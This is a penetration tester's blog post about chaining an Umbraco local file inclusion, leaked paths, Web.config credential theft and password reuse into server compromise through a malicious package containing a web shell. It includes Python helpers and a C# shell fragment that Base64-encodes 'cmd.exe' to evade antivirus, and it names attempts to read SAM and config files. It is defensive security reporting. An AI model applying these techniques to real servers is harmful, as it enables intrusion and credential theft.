
What is the Risk if You Don't Fix Perceived Meaningless Vulnerabilities?


In a recent external penetration test, I was able to chain multiple vulnerabilities together, allowing me to fully compromise one of the client's servers. Whilst many of these vulnerabilities were low risk on their own, it is important to address every security vulnerability in order to minimise the risk to systems.

The scope was large and the organisation had many websites built on the Umbraco CMS. My colleague, Robin, had identified a local file inclusion (LFI) vulnerability (vulnerability number one) in the Umbraco CMS (version <= 7.2.1), which he wrote about following one of his previous engagements a year ago. As I grew familiar with the client's network and websites, I went through them one by one, attempting to identify those that could be vulnerable to the LFI.

Luckily for me, one of the websites was vulnerable (website1). Initially, I attempted to read well-known Windows files, such as the hosts file, by requesting a URL like the following, where the "s" query string parameter is "C:\Windows\system32\drivers\etc\hosts" Base64 encoded:
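The exact vulnerable endpoint is not reproduced here, but as an illustrative sketch (the hostname and handler path below are placeholders, not the client's real URL), building such a request might look like this:

```python
import base64
from urllib.parse import urlencode

def lfi_url(base, file_path):
    # The target file path travels in the "s" query string parameter,
    # Base64 encoded, as described above.
    encoded = base64.b64encode(file_path.encode()).decode()
    return base + "?" + urlencode({"s": encoded})

# Placeholder host and handler path, for illustration only.
url = lfi_url("https://website1.example.com/vulnerable-handler",
              r"C:\Windows\system32\drivers\etc\hosts")
print(url)
```

A vulnerable handler would then decode the parameter server-side and return the file's contents in the response.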


And it worked. At that point I could have stopped testing and simply reported the issue. However, I wanted to exploit it further so I could demonstrate to the client the potential security implications of the vulnerability. Moving on, I attempted to read the Windows Security Account Manager (SAM) file at "%SYSTEMROOT%\repair\SAM", with no luck. I then tried to read the "Web.config" file from the web application's webroot, as it often contains credentials. Knowing that the web server in place was Microsoft IIS, I spent time trying to guess the website's webroot folder, for example "c:\inetpub\wwwroot\website1", but I couldn't find it.

Moving on to another website (website2), one of the first things I like to look for is whether there is a robots.txt file in place and, if so, whether it exposes any interesting directories (vulnerability number two). This website had one, and it exposed multiple directories, one of which seemed interesting. Exposing directories in the robots.txt file is typically a low-risk issue: it provides an attacker with helpful information about the website's file system, or may point them towards resources which are not supposed to be indexed by search engines. So, I requested that directory and received a detailed ASP.NET error (vulnerability number three), as shown below.
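As a sketch of that first check, the Disallow entries can be pulled out of a robots.txt body with a few lines of Python (the sample content below is invented, not the client's actual file):

```python
# Invented sample robots.txt content, for illustration only.
sample = """User-agent: *
Disallow: /admin/
Disallow: /backup/
Disallow: /staging/
"""

def disallowed_paths(robots_txt):
    """Return the paths listed in Disallow directives."""
    paths = []
    for line in robots_txt.splitlines():
        key, _, value = line.partition(":")
        if key.strip().lower() == "disallow" and value.strip():
            paths.append(value.strip())
    return paths

print(disallowed_paths(sample))
```

Each returned entry is a directory worth requesting manually, exactly as described above.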

[Screenshot: detailed ASP.NET error revealing the full path of a website file]

The ASP.NET error exposed the full path of one of the website's files, as you can see at the bottom of the screenshot. Clearly, the full path to the website's installation was quite complex.

The full path allowed me to understand the structure of their file system, which improved my chances of guessing the full path of the "Web.config" file in the first website, the one vulnerable to LFI (website1). In the end, that guessing was not necessary, because both websites were running on the same server: I could exploit the LFI vulnerability in website1 to read the "Web.config" file of website2, since I now knew the full path to its installation. All I wanted was access to a configuration file that might expose service credentials, so I could demonstrate the impact of the LFI vulnerability. Five minutes later, I had worked out the exact full path of the "Web.config" file and read it, as shown below.

[Screenshot: contents of the "Web.config" file retrieved through the LFI]

Why was I able to read the "Web.config" file of a different website's installation? This usually indicates a lack of isolation between web applications sharing the same server (vulnerability number four).

As expected, I found multiple database connection strings in there, many of them commented out, most likely because they were old configuration directives. Anything unnecessary should be removed from production environments, whether configuration directives, services or files (vulnerability number five). All of the passwords appeared to be randomly generated, apart from one.
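As a rough illustration of what I was looking for, the snippet below pulls the password values out of the connection strings in a Web.config-style document. The XML fragment and credentials are invented for the example; note that the XML parser silently drops the commented-out entries, which an attacker reviewing the raw file would still read:

```python
import xml.etree.ElementTree as ET

# Invented Web.config fragment; the real file's contents are not reproduced.
config = """<configuration>
  <connectionStrings>
    <!-- <add name="OldDb" connectionString="Server=db1;User Id=app;Password=OldPass1" /> -->
    <add name="MainDb" connectionString="Server=db2;User Id=app;Password=guessable1" />
  </connectionStrings>
</configuration>"""

root = ET.fromstring(config)
passwords = []
for add in root.iter("add"):
    # Connection strings are semicolon-delimited key=value pairs.
    for part in add.get("connectionString", "").split(";"):
        key, _, value = part.partition("=")
        if key.strip().lower() == "password":
            passwords.append(value.strip())
print(passwords)
```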

With that password, I could attempt to log in to various services by correctly guessing the username. Initially, I tried logging in with it as the "admin" user in the Umbraco administrator panel of every Umbraco installation, and that gave me administrative access to four websites. This highlighted two further security issues:

  • Insufficient Separation of Administration Functionality (vulnerability number six). An external user should not be able to reach the administrator's login panel on the same domain as the public website.
  • Password Re-Use (vulnerability number seven). Using the same password, or tiny variations of it, across various services is a very common security issue.


Having gained access to these admin panels, I started poking around for vulnerable Umbraco packages. One of them was vulnerable to cross-site scripting, but that would not allow me to compromise the server. Since the Umbraco CMS is extensible through packages, I could install any new package. I could even create my own malicious package which, if accepted by the website, installed and executed properly, would allow me to execute commands on the server. Umbraco itself permits this, simply warning its users to only install packages from sources they trust:

[Screenshot: uploading a malicious web shell package]

Creating an Umbraco package was straightforward: I only had to create a "package.xml" file (which instructs the Umbraco CMS how to handle the package) along with an ASP.NET file, which would in the end be my web shell, inside a ZIP file.
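Assembling the ZIP itself can be sketched as follows; note that the manifest here is a minimal placeholder and not a complete or accurate Umbraco "package.xml" schema, and the shell source is a stub:

```python
import io
import zipfile

# Placeholder manifest; the real Umbraco package.xml schema has more fields.
manifest = """<?xml version="1.0" encoding="utf-8"?>
<umbPackage>
  <files>
    <file>dshell.aspx</file>
  </files>
</umbPackage>"""

# Stub standing in for the ASP.NET web shell source.
shell_source = "<%-- ASP.NET web shell source would go here --%>"

buf = io.BytesIO()
with zipfile.ZipFile(buf, "w") as pkg:
    pkg.writestr("package.xml", manifest)
    pkg.writestr("dshell.aspx", shell_source)

# The resulting buffer is the package that gets uploaded.
print(zipfile.ZipFile(io.BytesIO(buf.getvalue())).namelist())
```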

After creating a malicious Umbraco package and testing it on a local Umbraco CMS installation of the same version, I had a working web shell package. I used a simple .aspx web shell that we maintain in our private GitLab, along with the required "package.xml" file. The shell spawns a new process, either the Windows Command Prompt ("cmd.exe") or PowerShell, and accepts commands from a simple HTML form.

It was now time to test it on the target website. Uploading the web shell package and trying to access it at "https://www.example.com/dionach/dshell.aspx" gave me a 404 "File not found" error. That could mean one of two things: either the file was being uploaded to a different path from the one I chose in the "package.xml" file, or an antivirus mechanism was in place deleting the malicious file. Next, I uploaded another package containing a harmless .aspx file which simply echoed "Hello World", and its successful upload confirmed my antivirus suspicions. Before attempting to bypass the antivirus by encoding my web shell with well-known tools such as msfvenom, I tried Base64 encoding the only part of the ASP.NET code that looked obviously suspicious and would be picked up by even the simplest string-matching antivirus:

string RunCmd(string arg) {
    ProcessStartInfo psi = new ProcessStartInfo();
    // Base64Decode("Y21kLmV4ZQ==") returns "cmd.exe"; encoding the string
    // hides it from simple signature-based antivirus matching
    psi.FileName = Base64Decode("Y21kLmV4ZQ==");
    psi.Arguments = "/c " + arg;
    // ... start the process and return its output
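For reference, the Base64 string in the snippet above is simply "cmd.exe" encoded, which a couple of lines of Python confirm:

```python
import base64

# Decode the string that was hidden from the antivirus in the web shell.
decoded = base64.b64decode("Y21kLmV4ZQ==").decode()
print(decoded)  # cmd.exe
```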

That worked, and I now had a shell on the server.

At this point I stopped the testing and liaised with the client to resolve these vulnerabilities quickly. It is worth mentioning that an attacker would most likely try to escalate their privileges on that server and then keep moving further into the organisation's network and systems.

To sum up, I would like to stress that, out of the seven vulnerabilities, only the first would be considered high risk when viewed in isolation. In most instances, the remaining vulnerabilities would be classed as medium or low risk. What might appear to be a trivial issue may in fact serve as the vital link which chains together an otherwise unlikely exploitation path. Hopefully, that makes my initial point clear: every security issue that is reported should be resolved where possible.

Posted by Nick
